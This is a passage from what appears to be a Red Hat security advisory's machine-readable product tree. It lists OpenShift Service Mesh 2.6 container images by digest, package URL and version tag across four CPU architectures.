name: "RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.6::el8", }, }, }, { category: "product_name", name: "RHOSSM 2.6 for RHEL 9", product: { name: "RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.6::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Service Mesh", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", product_id: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", product_id: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", product_id: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", product_id: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", product_id: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: 